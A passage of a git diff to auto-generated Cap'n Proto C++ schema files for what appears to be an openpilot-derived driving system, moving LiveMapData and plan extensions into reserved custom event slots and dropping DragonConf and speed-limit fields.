0, - 21, 19, 0, 0, 218, 0, 0, 0, + 225, 18, 0, 0, 218, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 28, 19, 0, 0, 3, 0, 1, 0, - 40, 19, 0, 0, 2, 0, 1, 0, - 86, 0, 134, 255, 0, 0, 0, 0, - 0, 0, 1, 0, 123, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 37, 19, 0, 0, 90, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 36, 19, 0, 0, 3, 0, 1, 0, - 48, 19, 0, 0, 2, 0, 1, 0, - 87, 0, 133, 255, 0, 0, 0, 0, - 0, 0, 1, 0, 124, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 45, 19, 0, 0, 98, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 44, 19, 0, 0, 3, 0, 1, 0, - 56, 19, 0, 0, 2, 0, 1, 0, + 232, 18, 0, 0, 3, 0, 1, 0, + 244, 18, 0, 0, 2, 0, 1, 0, 108, 111, 103, 77, 111, 110, 111, 84, 105, 109, 101, 0, 0, 0, 0, 0, 9, 0, 0, 0, 0, 0, 0, 0, @@ -29500,8 +28691,8 @@ static const ::capnp::_::AlignedData<2124> b_d314cfd957229c11 = { 16, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 99, 117, 115, 116, 111, 109, 82, 101, - 115, 101, 114, 118, 101, 100, 48, 0, + 108, 105, 118, 101, 77, 97, 112, 68, + 97, 116, 97, 0, 0, 0, 0, 0, 16, 0, 0, 0, 0, 0, 0, 0, 175, 244, 76, 57, 90, 240, 194, 129, 0, 0, 0, 0, 0, 0, 0, 0, @@ -29509,8 +28700,9 @@ static const ::capnp::_::AlignedData<2124> b_d314cfd957229c11 = { 16, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 99, 117, 115, 116, 111, 109, 82, 101, - 115, 101, 114, 118, 101, 100, 49, 0, + 108, 111, 110, 103, 105, 116, 117, 100, + 105, 110, 97, 108, 80, 108, 97, 110, + 69, 120, 116, 0, 0, 0, 0, 0, 16, 0, 0, 0, 0, 0, 0, 0, 93, 181, 231, 49, 143, 253, 223, 174, 0, 0, 0, 0, 0, 0, 0, 0, @@ -29518,8 +28710,8 @@ static const ::capnp::_::AlignedData<2124> b_d314cfd957229c11 = { 16, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 99, 117, 115, 116, 111, 109, 82, 101, - 115, 101, 114, 118, 101, 100, 50, 0, + 108, 97, 116, 101, 114, 97, 108, 80, + 108, 97, 110, 69, 120, 116, 0, 0, 16, 0, 0, 0, 0, 0, 0, 0, 194, 110, 191, 11, 86, 196, 92, 243, 0, 0, 0, 0, 0, 0, 0, 0, @@ -29652,24 +28844,6 @@ static const ::capnp::_::AlignedData<2124> b_d314cfd957229c11 = { 240, 133, 221, 85, 179, 234, 154, 207, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 16, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 100, 114, 97, 103, 111, 110, 67, 111, - 110, 102, 0, 0, 0, 0, 0, 0, - 16, 0, 0, 0, 0, 0, 0, 0, - 18, 125, 23, 195, 117, 213, 229, 132, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 16, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 108, 105, 118, 101, 77, 97, 112, 68, - 97, 116, 97, 0, 0, 0, 0, 0, - 16, 0, 0, 0, 0, 0, 0, 0, - 204, 185, 211, 240, 32, 246, 84, 152, - 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, 16, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, } @@ -29679,7 +28853,6 @@ static const ::capnp::_::AlignedData<2124> b_d314cfd957229c11 = { static const ::capnp::_::RawSchema* const d_d314cfd957229c11[] = { &s_80ae746ee2596b11, &s_81c2f05a394cf4af, - &s_84e5d575c3177d12, &s_85dddd7ce6cefa5d, &s_8785009a964c7c59, &s_88dcce08ad29dda0, @@ -29695,7 +28868,6 @@ static const ::capnp::_::RawSchema* const d_d314cfd957229c11[] = { &s_94b7baa90c5c321e, &s_96df70754d8390bc, &s_97ff69c53601abf1, - &s_9854f620f0d3b9cc, &s_9a185389d6fdd05f, &s_9b1657f34caf3ad3, &s_9b326d4e436afec7, @@ -29766,11 +28938,11 @@ static const ::capnp::_::RawSchema* const d_d314cfd957229c11[] = { &s_fe346a9de48d9b50, &s_fe35ad896ffaeacf, }; -static const uint16_t m_d314cfd957229c11[] = {98, 101, 30, 20, 55, 42, 60, 63, 5, 23, 68, 69, 22, 28, 35, 7, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 6, 123, 70, 87, 76, 71, 59, 92, 85, 26, 10, 91, 21, 48, 3, 41, 40, 99, 100, 1, 65, 64, 32, 96, 19, 8, 46, 25, 72, 51, 44, 37, 124, 62, 36, 61, 94, 16, 14, 122, 119, 120, 117, 121, 118, 49, 18, 0, 24, 95, 78, 105, 103, 9, 75, 82, 104, 83, 38, 84, 27, 54, 58, 56, 47, 53, 45, 12, 81, 80, 33, 89, 90, 31, 13, 2, 86, 15, 17, 4, 11, 73, 97, 52, 66, 43, 34, 39, 102, 57, 50, 106, 79, 93, 67, 74, 88, 77, 29}; -static const uint16_t i_d314cfd957229c11[] = {1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 122, 123, 124, 0, 67}; +static const uint16_t m_d314cfd957229c11[] = {98, 101, 30, 20, 55, 42, 60, 63, 5, 23, 68, 69, 22, 28, 35, 7, 110, 111, 112, 113, 114, 115, 116, 6, 70, 87, 76, 71, 59, 92, 85, 26, 10, 91, 21, 48, 3, 41, 40, 99, 100, 1, 65, 64, 109, 32, 96, 19, 8, 46, 25, 72, 51, 44, 37, 107, 62, 36, 61, 94, 16, 14, 122, 119, 120, 117, 121, 118, 49, 18, 0, 24, 108, 95, 78, 105, 103, 9, 75, 82, 104, 83, 38, 84, 27, 54, 58, 56, 47, 53, 45, 12, 81, 80, 33, 89, 90, 31, 13, 2, 86, 15, 17, 4, 11, 73, 97, 52, 66, 43, 34, 39, 102, 57, 50, 106, 79, 93, 67, 74, 88, 77, 29}; +static const uint16_t i_d314cfd957229c11[] = {1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 122, 0, 67}; const ::capnp::_::RawSchema s_d314cfd957229c11 = { - 0xd314cfd957229c11, b_d314cfd957229c11.words, 2124, d_d314cfd957229c11, m_d314cfd957229c11, - 88, 125, i_d314cfd957229c11, nullptr, nullptr, { &s_d314cfd957229c11, nullptr, nullptr, 0, 0, nullptr } + 0xd314cfd957229c11, b_d314cfd957229c11.words, 2093, d_d314cfd957229c11, m_d314cfd957229c11, + 86, 123, i_d314cfd957229c11, nullptr, nullptr, { &s_d314cfd957229c11, nullptr, nullptr, 0, 0, nullptr } }; #endif // !CAPNP_LITE } // namespace schemas @@ -30508,14 +29680,6 @@ constexpr ::capnp::Kind CameraOdometry::_capnpPrivate::kind; constexpr ::capnp::_::RawSchema const* CameraOdometry::_capnpPrivate::schema; #endif // !CAPNP_LITE -// LiveMapData -constexpr uint16_t LiveMapData::_capnpPrivate::dataWordSize; -constexpr uint16_t LiveMapData::_capnpPrivate::pointerCount; -#if !CAPNP_LITE -constexpr ::capnp::Kind LiveMapData::_capnpPrivate::kind; -constexpr ::capnp::_::RawSchema const* LiveMapData::_capnpPrivate::schema; -#endif // !CAPNP_LITE - // Sentinel constexpr uint16_t Sentinel::_capnpPrivate::dataWordSize; constexpr uint16_t Sentinel::_capnpPrivate::pointerCount; diff --git a/cereal/gen/cpp/log.capnp.h b/cereal/gen/cpp/log.capnp.h index a5d433aac..0e0dbf7d7 100644 --- a/cereal/gen/cpp/log.capnp.h +++ b/cereal/gen/cpp/log.capnp.h @@ -12,7 +12,6 @@ #include "car.capnp.h" #include "custom.capnp.h" -#include "dp.capnp.h" #include "legacy.capnp.h" namespace capnp { @@ -292,28 +291,9 @@ enum class LongitudinalPlanSource_b231a753cc079120: uint16_t { LEAD1, LEAD2, E2E, - TURN, - LIMIT, - TURNLIMIT, }; CAPNP_DECLARE_ENUM(LongitudinalPlanSource, b231a753cc079120); CAPNP_DECLARE_SCHEMA(8cfeb072f5301000); -CAPNP_DECLARE_SCHEMA(db9b50f4604547c0); -enum class SpeedLimitControlState_db9b50f4604547c0: uint16_t { - INACTIVE, - TEMP_INACTIVE, - ADAPTING, - ACTIVE, -}; -CAPNP_DECLARE_ENUM(SpeedLimitControlState, db9b50f4604547c0); -CAPNP_DECLARE_SCHEMA(e1514857915ad376); -enum class VisionTurnControllerState_e1514857915ad376: uint16_t { - DISABLED, - ENTERING, - TURNING, - LEAVING, -}; -CAPNP_DECLARE_ENUM(VisionTurnControllerState, e1514857915ad376); CAPNP_DECLARE_SCHEMA(fc0c9bb05e3927c1); CAPNP_DECLARE_SCHEMA(e1e9318e2ae8b51e); CAPNP_DECLARE_SCHEMA(fdca7c675b7021c6); @@ -470,7 +450,6 @@ CAPNP_DECLARE_SCHEMA(d9058dcb967c2753); CAPNP_DECLARE_SCHEMA(e61690eb0b091692); CAPNP_DECLARE_SCHEMA(943e268f93f711a6); CAPNP_DECLARE_SCHEMA(fa9a296b9fd41a96); -CAPNP_DECLARE_SCHEMA(9854f620f0d3b9cc); CAPNP_DECLARE_SCHEMA(ef0382d244f56e38); CAPNP_DECLARE_SCHEMA(a2d8e61eb6f7031a); enum class SentinelType_a2d8e61eb6f7031a: uint16_t { @@ -1130,7 +1109,7 @@ struct ControlsState::LateralControlState { enum Which: uint16_t { INDI_STATE, PID_STATE, - LQR_STATE, + LQR_STATE_D_E_P_R_E_C_A_T_E_D, ANGLE_STATE, DEBUG_STATE, TORQUE_STATE, @@ -1175,7 +1154,7 @@ struct ModelDataV2 { struct Pose; struct _capnpPrivate { - CAPNP_DECLARE_STRUCT_HEADER(c4713f6b0d36abe9, 5, 15) + CAPNP_DECLARE_STRUCT_HEADER(c4713f6b0d36abe9, 6, 15) #if !CAPNP_LITE static constexpr ::capnp::_::RawBrandedSchema const* brand() { return &schema->defaultBrand; } #endif // !CAPNP_LITE @@ -1298,13 +1277,9 @@ struct LongitudinalPlan { typedef ::capnp::schemas::LongitudinalPlanSource_b231a753cc079120 LongitudinalPlanSource; struct GpsTrajectory; - typedef ::capnp::schemas::SpeedLimitControlState_db9b50f4604547c0 SpeedLimitControlState; - - typedef ::capnp::schemas::VisionTurnControllerState_e1514857915ad376 VisionTurnControllerState; - struct _capnpPrivate { - CAPNP_DECLARE_STRUCT_HEADER(e00b5b3eba12876c, 15, 7) + CAPNP_DECLARE_STRUCT_HEADER(e00b5b3eba12876c, 11, 6) #if !CAPNP_LITE static constexpr ::capnp::_::RawBrandedSchema const* brand() { return &schema->defaultBrand; } #endif // !CAPNP_LITE @@ -1356,7 +1331,7 @@ struct LateralPlan { struct _capnpPrivate { - CAPNP_DECLARE_STRUCT_HEADER(e1e9318e2ae8b51e, 9, 11) + CAPNP_DECLARE_STRUCT_HEADER(e1e9318e2ae8b51e, 9, 9) #if !CAPNP_LITE static constexpr ::capnp::_::RawBrandedSchema const* brand() { return &schema->defaultBrand; } #endif // !CAPNP_LITE @@ -2083,21 +2058,6 @@ struct CameraOdometry { }; }; -struct LiveMapData { - LiveMapData() = delete; - - class Reader; - class Builder; - class Pipeline; - - struct _capnpPrivate { - CAPNP_DECLARE_STRUCT_HEADER(9854f620f0d3b9cc, 8, 4) - #if !CAPNP_LITE - static constexpr ::capnp::_::RawBrandedSchema const* brand() { return &schema->defaultBrand; } - #endif // !CAPNP_LITE - }; -}; - struct Sentinel { Sentinel() = delete; @@ -2266,7 +2226,7 @@ struct NavModelData { struct XYData; struct _capnpPrivate { - CAPNP_DECLARE_STRUCT_HEADER(ac3de5c437be057a, 2, 3) + CAPNP_DECLARE_STRUCT_HEADER(ac3de5c437be057a, 3, 3) #if !CAPNP_LITE static constexpr ::capnp::_::RawBrandedSchema const* brand() { return &schema->defaultBrand; } #endif // !CAPNP_LITE @@ -2445,9 +2405,9 @@ struct Event { NAV_MODEL, MAP_RENDER_STATE, UI_PLAN, - CUSTOM_RESERVED0, - CUSTOM_RESERVED1, - CUSTOM_RESERVED2, + LIVE_MAP_DATA, + LONGITUDINAL_PLAN_EXT, + LATERAL_PLAN_EXT, CUSTOM_RESERVED3, CUSTOM_RESERVED4, CUSTOM_RESERVED5, @@ -2461,8 +2421,6 @@ struct Event { LIVESTREAM_ROAD_ENCODE_DATA, LIVESTREAM_WIDE_ROAD_ENCODE_DATA, LIVESTREAM_DRIVER_ENCODE_DATA, - DRAGON_CONF, - LIVE_MAP_DATA, }; struct _capnpPrivate { @@ -5510,8 +5468,6 @@ public: inline float getSbu2Voltage() const; - inline bool getTorqueInterceptorDetected() const; - private: ::capnp::_::StructReader _reader; template @@ -5668,9 +5624,6 @@ public: inline float getSbu2Voltage(); inline void setSbu2Voltage(float value); - inline bool getTorqueInterceptorDetected(); - inline void setTorqueInterceptorDetected(bool value); - private: ::capnp::_::StructBuilder _builder; template @@ -6751,8 +6704,6 @@ public: inline bool getExperimentalMode() const; - inline bool getDpLateralAltActive() const; - private: ::capnp::_::StructReader _reader; template @@ -6982,9 +6933,6 @@ public: inline bool getExperimentalMode(); inline void setExperimentalMode(bool value); - inline bool getDpLateralAltActive(); - inline void setDpLateralAltActive(bool value); - private: ::capnp::_::StructBuilder _builder; template @@ -7830,9 +7778,9 @@ public: inline bool hasPidState() const; inline ::cereal::ControlsState::LateralPIDState::Reader getPidState() const; - inline bool isLqrState() const; - inline bool hasLqrState() const; - inline ::cereal::ControlsState::LateralLQRState::Reader getLqrState() const; + inline bool isLqrStateDEPRECATED() const; + inline bool hasLqrStateDEPRECATED() const; + inline ::cereal::ControlsState::LateralLQRState::Reader getLqrStateDEPRECATED() const; inline bool isAngleState() const; inline bool hasAngleState() const; @@ -7895,13 +7843,13 @@ public: inline void adoptPidState(::capnp::Orphan< ::cereal::ControlsState::LateralPIDState>&& value); inline ::capnp::Orphan< ::cereal::ControlsState::LateralPIDState> disownPidState(); - inline bool isLqrState(); - inline bool hasLqrState(); - inline ::cereal::ControlsState::LateralLQRState::Builder getLqrState(); - inline void setLqrState( ::cereal::ControlsState::LateralLQRState::Reader value); - inline ::cereal::ControlsState::LateralLQRState::Builder initLqrState(); - inline void adoptLqrState(::capnp::Orphan< ::cereal::ControlsState::LateralLQRState>&& value); - inline ::capnp::Orphan< ::cereal::ControlsState::LateralLQRState> disownLqrState(); + inline bool isLqrStateDEPRECATED(); + inline bool hasLqrStateDEPRECATED(); + inline ::cereal::ControlsState::LateralLQRState::Builder getLqrStateDEPRECATED(); + inline void setLqrStateDEPRECATED( ::cereal::ControlsState::LateralLQRState::Reader value); + inline ::cereal::ControlsState::LateralLQRState::Builder initLqrStateDEPRECATED(); + inline void adoptLqrStateDEPRECATED(::capnp::Orphan< ::cereal::ControlsState::LateralLQRState>&& value); + inline ::capnp::Orphan< ::cereal::ControlsState::LateralLQRState> disownLqrStateDEPRECATED(); inline bool isAngleState(); inline bool hasAngleState(); @@ -8189,6 +8137,8 @@ public: inline ::cereal::ModelDataV2::ConfidenceClass getConfidence() const; + inline ::uint64_t getLocationMonoTime() const; + private: ::capnp::_::StructReader _reader; template @@ -8352,6 +8302,9 @@ public: inline ::cereal::ModelDataV2::ConfidenceClass getConfidence(); inline void setConfidence( ::cereal::ModelDataV2::ConfidenceClass value); + inline ::uint64_t getLocationMonoTime(); + inline void setLocationMonoTime( ::uint64_t value); + private: ::capnp::_::StructBuilder _builder; template @@ -9394,37 +9347,6 @@ public: inline ::cereal::LongitudinalPersonality getPersonality() const; - inline ::cereal::LongitudinalPlan::VisionTurnControllerState getVisionTurnControllerState() const; - - inline float getVisionTurnSpeed() const; - - inline ::cereal::LongitudinalPlan::SpeedLimitControlState getSpeedLimitControlState() const; - - inline float getSpeedLimit() const; - - inline float getSpeedLimitOffset() const; - - inline float getDistToSpeedLimit() const; - - inline bool getIsMapSpeedLimit() const; - - inline bool getSpeedLimitPercOffset() const; - - inline float getSpeedLimitValueOffset() const; - - inline float getDistToTurn() const; - - inline float getTurnSpeed() const; - - inline ::cereal::LongitudinalPlan::SpeedLimitControlState getTurnSpeedControlState() const; - - inline ::int16_t getTurnSign() const; - - inline bool getDpE2EIsBlended() const; - - inline bool hasDistances() const; - inline ::capnp::List::Reader getDistances() const; - private: ::capnp::_::StructReader _reader; template @@ -9592,56 +9514,6 @@ public: inline ::cereal::LongitudinalPersonality getPersonality(); inline void setPersonality( ::cereal::LongitudinalPersonality value); - inline ::cereal::LongitudinalPlan::VisionTurnControllerState getVisionTurnControllerState(); - inline void setVisionTurnControllerState( ::cereal::LongitudinalPlan::VisionTurnControllerState value); - - inline float getVisionTurnSpeed(); - inline void setVisionTurnSpeed(float value); - - inline ::cereal::LongitudinalPlan::SpeedLimitControlState getSpeedLimitControlState(); - inline void setSpeedLimitControlState( ::cereal::LongitudinalPlan::SpeedLimitControlState value); - - inline float getSpeedLimit(); - inline void setSpeedLimit(float value); - - inline float getSpeedLimitOffset(); - inline void setSpeedLimitOffset(float value); - - inline float getDistToSpeedLimit(); - inline void setDistToSpeedLimit(float value); - - inline bool getIsMapSpeedLimit(); - inline void setIsMapSpeedLimit(bool value); - - inline bool getSpeedLimitPercOffset(); - inline void setSpeedLimitPercOffset(bool value); - - inline float getSpeedLimitValueOffset(); - inline void setSpeedLimitValueOffset(float value); - - inline float getDistToTurn(); - inline void setDistToTurn(float value); - - inline float getTurnSpeed(); - inline void setTurnSpeed(float value); - - inline ::cereal::LongitudinalPlan::SpeedLimitControlState getTurnSpeedControlState(); - inline void setTurnSpeedControlState( ::cereal::LongitudinalPlan::SpeedLimitControlState value); - - inline ::int16_t getTurnSign(); - inline void setTurnSign( ::int16_t value); - - inline bool getDpE2EIsBlended(); - inline void setDpE2EIsBlended(bool value); - - inline bool hasDistances(); - inline ::capnp::List::Builder getDistances(); - inline void setDistances( ::capnp::List::Reader value); - inline void setDistances(::kj::ArrayPtr value); - inline ::capnp::List::Builder initDistances(unsigned int size); - inline void adoptDistances(::capnp::Orphan< ::capnp::List>&& value); - inline ::capnp::Orphan< ::capnp::List> disownDistances(); - private: ::capnp::_::StructBuilder _builder; template @@ -9954,12 +9826,6 @@ public: inline bool hasSolverState() const; inline ::cereal::LateralPlan::SolverState::Reader getSolverState() const; - inline bool hasDPathWLinesX() const; - inline ::capnp::List::Reader getDPathWLinesX() const; - - inline bool hasDPathWLinesY() const; - inline ::capnp::List::Reader getDPathWLinesY() const; - private: ::capnp::_::StructReader _reader; template @@ -10134,22 +10000,6 @@ public: inline void adoptSolverState(::capnp::Orphan< ::cereal::LateralPlan::SolverState>&& value); inline ::capnp::Orphan< ::cereal::LateralPlan::SolverState> disownSolverState(); - inline bool hasDPathWLinesX(); - inline ::capnp::List::Builder getDPathWLinesX(); - inline void setDPathWLinesX( ::capnp::List::Reader value); - inline void setDPathWLinesX(::kj::ArrayPtr value); - inline ::capnp::List::Builder initDPathWLinesX(unsigned int size); - inline void adoptDPathWLinesX(::capnp::Orphan< ::capnp::List>&& value); - inline ::capnp::Orphan< ::capnp::List> disownDPathWLinesX(); - - inline bool hasDPathWLinesY(); - inline ::capnp::List::Builder getDPathWLinesY(); - inline void setDPathWLinesY( ::capnp::List::Reader value); - inline void setDPathWLinesY(::kj::ArrayPtr value); - inline ::capnp::List::Builder initDPathWLinesY(unsigned int size); - inline void adoptDPathWLinesY(::capnp::Orphan< ::capnp::List>&& value); - inline ::capnp::Orphan< ::capnp::List> disownDPathWLinesY(); - private: ::capnp::_::StructBuilder _builder; template @@ -16928,200 +16778,6 @@ private: }; #endif // !CAPNP_LITE -class LiveMapData::Reader { -public: - typedef LiveMapData Reads; - - Reader() = default; - inline explicit Reader(::capnp::_::StructReader base): _reader(base) {} - - inline ::capnp::MessageSize totalSize() const { - return _reader.totalSize().asPublic(); - } - -#if !CAPNP_LITE - inline ::kj::StringTree toString() const { - return ::capnp::_::structString(_reader, *_capnpPrivate::brand()); - } -#endif // !CAPNP_LITE - - inline bool getSpeedLimitValid() const; - - inline float getSpeedLimit() const; - - inline bool getSpeedLimitAheadValid() const; - - inline float getSpeedLimitAhead() const; - - inline float getSpeedLimitAheadDistance() const; - - inline bool getTurnSpeedLimitValid() const; - - inline float getTurnSpeedLimit() const; - - inline float getTurnSpeedLimitEndDistance() const; - - inline ::int16_t getTurnSpeedLimitSign() const; - - inline bool hasTurnSpeedLimitsAhead() const; - inline ::capnp::List::Reader getTurnSpeedLimitsAhead() const; - - inline bool hasTurnSpeedLimitsAheadDistances() const; - inline ::capnp::List::Reader getTurnSpeedLimitsAheadDistances() const; - - inline bool hasTurnSpeedLimitsAheadSigns() const; - inline ::capnp::List< ::int16_t, ::capnp::Kind::PRIMITIVE>::Reader getTurnSpeedLimitsAheadSigns() const; - - inline ::int64_t getLastGpsTimestamp() const; - - inline bool hasCurrentRoadName() const; - inline ::capnp::Text::Reader getCurrentRoadName() const; - - inline double getLastGpsLatitude() const; - - inline double getLastGpsLongitude() const; - - inline float getLastGpsSpeed() const; - - inline float getLastGpsBearingDeg() const; - - inline float getLastGpsAccuracy() const; - - inline float getLastGpsBearingAccuracyDeg() const; - -private: - ::capnp::_::StructReader _reader; - template - friend struct ::capnp::ToDynamic_; - template - friend struct ::capnp::_::PointerHelpers; - template - friend struct ::capnp::List; - friend class ::capnp::MessageBuilder; - friend class ::capnp::Orphanage; -}; - -class LiveMapData::Builder { -public: - typedef LiveMapData Builds; - - Builder() = delete; // Deleted to discourage incorrect usage. - // You can explicitly initialize to nullptr instead. - inline Builder(decltype(nullptr)) {} - inline explicit Builder(::capnp::_::StructBuilder base): _builder(base) {} - inline operator Reader() const { return Reader(_builder.asReader()); } - inline Reader asReader() const { return *this; } - - inline ::capnp::MessageSize totalSize() const { return asReader().totalSize(); } -#if !CAPNP_LITE - inline ::kj::StringTree toString() const { return asReader().toString(); } -#endif // !CAPNP_LITE - - inline bool getSpeedLimitValid(); - inline void setSpeedLimitValid(bool value); - - inline float getSpeedLimit(); - inline void setSpeedLimit(float value); - - inline bool getSpeedLimitAheadValid(); - inline void setSpeedLimitAheadValid(bool value); - - inline float getSpeedLimitAhead(); - inline void setSpeedLimitAhead(float value); - - inline float getSpeedLimitAheadDistance(); - inline void setSpeedLimitAheadDistance(float value); - - inline bool getTurnSpeedLimitValid(); - inline void setTurnSpeedLimitValid(bool value); - - inline float getTurnSpeedLimit(); - inline void setTurnSpeedLimit(float value); - - inline float getTurnSpeedLimitEndDistance(); - inline void setTurnSpeedLimitEndDistance(float value); - - inline ::int16_t getTurnSpeedLimitSign(); - inline void setTurnSpeedLimitSign( ::int16_t value); - - inline bool hasTurnSpeedLimitsAhead(); - inline ::capnp::List::Builder getTurnSpeedLimitsAhead(); - inline void setTurnSpeedLimitsAhead( ::capnp::List::Reader value); - inline void setTurnSpeedLimitsAhead(::kj::ArrayPtr value); - inline ::capnp::List::Builder initTurnSpeedLimitsAhead(unsigned int size); - inline void adoptTurnSpeedLimitsAhead(::capnp::Orphan< ::capnp::List>&& value); - inline ::capnp::Orphan< ::capnp::List> disownTurnSpeedLimitsAhead(); - - inline bool hasTurnSpeedLimitsAheadDistances(); - inline ::capnp::List::Builder getTurnSpeedLimitsAheadDistances(); - inline void setTurnSpeedLimitsAheadDistances( ::capnp::List::Reader value); - inline void setTurnSpeedLimitsAheadDistances(::kj::ArrayPtr value); - inline ::capnp::List::Builder initTurnSpeedLimitsAheadDistances(unsigned int size); - inline void adoptTurnSpeedLimitsAheadDistances(::capnp::Orphan< ::capnp::List>&& value); - inline ::capnp::Orphan< ::capnp::List> disownTurnSpeedLimitsAheadDistances(); - - inline bool hasTurnSpeedLimitsAheadSigns(); - inline ::capnp::List< ::int16_t, ::capnp::Kind::PRIMITIVE>::Builder getTurnSpeedLimitsAheadSigns(); - inline void setTurnSpeedLimitsAheadSigns( ::capnp::List< ::int16_t, ::capnp::Kind::PRIMITIVE>::Reader value); - inline void setTurnSpeedLimitsAheadSigns(::kj::ArrayPtr value); - inline ::capnp::List< ::int16_t, ::capnp::Kind::PRIMITIVE>::Builder initTurnSpeedLimitsAheadSigns(unsigned int size); - inline void adoptTurnSpeedLimitsAheadSigns(::capnp::Orphan< ::capnp::List< ::int16_t, ::capnp::Kind::PRIMITIVE>>&& value); - inline ::capnp::Orphan< ::capnp::List< ::int16_t, ::capnp::Kind::PRIMITIVE>> disownTurnSpeedLimitsAheadSigns(); - - inline ::int64_t getLastGpsTimestamp(); - inline void setLastGpsTimestamp( ::int64_t value); - - inline bool hasCurrentRoadName(); - inline ::capnp::Text::Builder getCurrentRoadName(); - inline void setCurrentRoadName( ::capnp::Text::Reader value); - inline ::capnp::Text::Builder initCurrentRoadName(unsigned int size); - inline void adoptCurrentRoadName(::capnp::Orphan< ::capnp::Text>&& value); - inline ::capnp::Orphan< ::capnp::Text> disownCurrentRoadName(); - - inline double getLastGpsLatitude(); - inline void setLastGpsLatitude(double value); - - inline double getLastGpsLongitude(); - inline void setLastGpsLongitude(double value); - - inline float getLastGpsSpeed(); - inline void setLastGpsSpeed(float value); - - inline float getLastGpsBearingDeg(); - inline void setLastGpsBearingDeg(float value); - - inline float getLastGpsAccuracy(); - inline void setLastGpsAccuracy(float value); - - inline float getLastGpsBearingAccuracyDeg(); - inline void setLastGpsBearingAccuracyDeg(float value); - -private: - ::capnp::_::StructBuilder _builder; - template - friend struct ::capnp::ToDynamic_; - friend class ::capnp::Orphanage; - template - friend struct ::capnp::_::PointerHelpers; -}; - -#if !CAPNP_LITE -class LiveMapData::Pipeline { -public: - typedef LiveMapData Pipelines; - - inline Pipeline(decltype(nullptr)): _typeless(nullptr) {} - inline explicit Pipeline(::capnp::AnyPointer::Pipeline&& typeless) - : _typeless(kj::mv(typeless)) {} - -private: - ::capnp::AnyPointer::Pipeline _typeless; - friend class ::capnp::PipelineHook; - template - friend struct ::capnp::ToDynamic_; -}; -#endif // !CAPNP_LITE - class Sentinel::Reader { public: typedef Sentinel Reads; @@ -18100,6 +17756,8 @@ public: inline bool hasDesirePrediction() const; inline ::capnp::List::Reader getDesirePrediction() const; + inline ::uint64_t getLocationMonoTime() const; + private: ::capnp::_::StructReader _reader; template @@ -18160,6 +17818,9 @@ public: inline void adoptDesirePrediction(::capnp::Orphan< ::capnp::List>&& value); inline ::capnp::Orphan< ::capnp::List> disownDesirePrediction(); + inline ::uint64_t getLocationMonoTime(); + inline void setLocationMonoTime( ::uint64_t value); + private: ::capnp::_::StructBuilder _builder; template @@ -19013,17 +18674,17 @@ public: inline bool hasUiPlan() const; inline ::cereal::UiPlan::Reader getUiPlan() const; - inline bool isCustomReserved0() const; - inline bool hasCustomReserved0() const; - inline ::cereal::CustomReserved0::Reader getCustomReserved0() const; + inline bool isLiveMapData() const; + inline bool hasLiveMapData() const; + inline ::cereal::LiveMapData::Reader getLiveMapData() const; - inline bool isCustomReserved1() const; - inline bool hasCustomReserved1() const; - inline ::cereal::CustomReserved1::Reader getCustomReserved1() const; + inline bool isLongitudinalPlanExt() const; + inline bool hasLongitudinalPlanExt() const; + inline ::cereal::LongitudinalPlanExt::Reader getLongitudinalPlanExt() const; - inline bool isCustomReserved2() const; - inline bool hasCustomReserved2() const; - inline ::cereal::CustomReserved2::Reader getCustomReserved2() const; + inline bool isLateralPlanExt() const; + inline bool hasLateralPlanExt() const; + inline ::cereal::LateralPlanExt::Reader getLateralPlanExt() const; inline bool isCustomReserved3() const; inline bool hasCustomReserved3() const; @@ -19077,14 +18738,6 @@ public: inline bool hasLivestreamDriverEncodeData() const; inline ::cereal::EncodeData::Reader getLivestreamDriverEncodeData() const; - inline bool isDragonConf() const; - inline bool hasDragonConf() const; - inline ::cereal::DragonConf::Reader getDragonConf() const; - 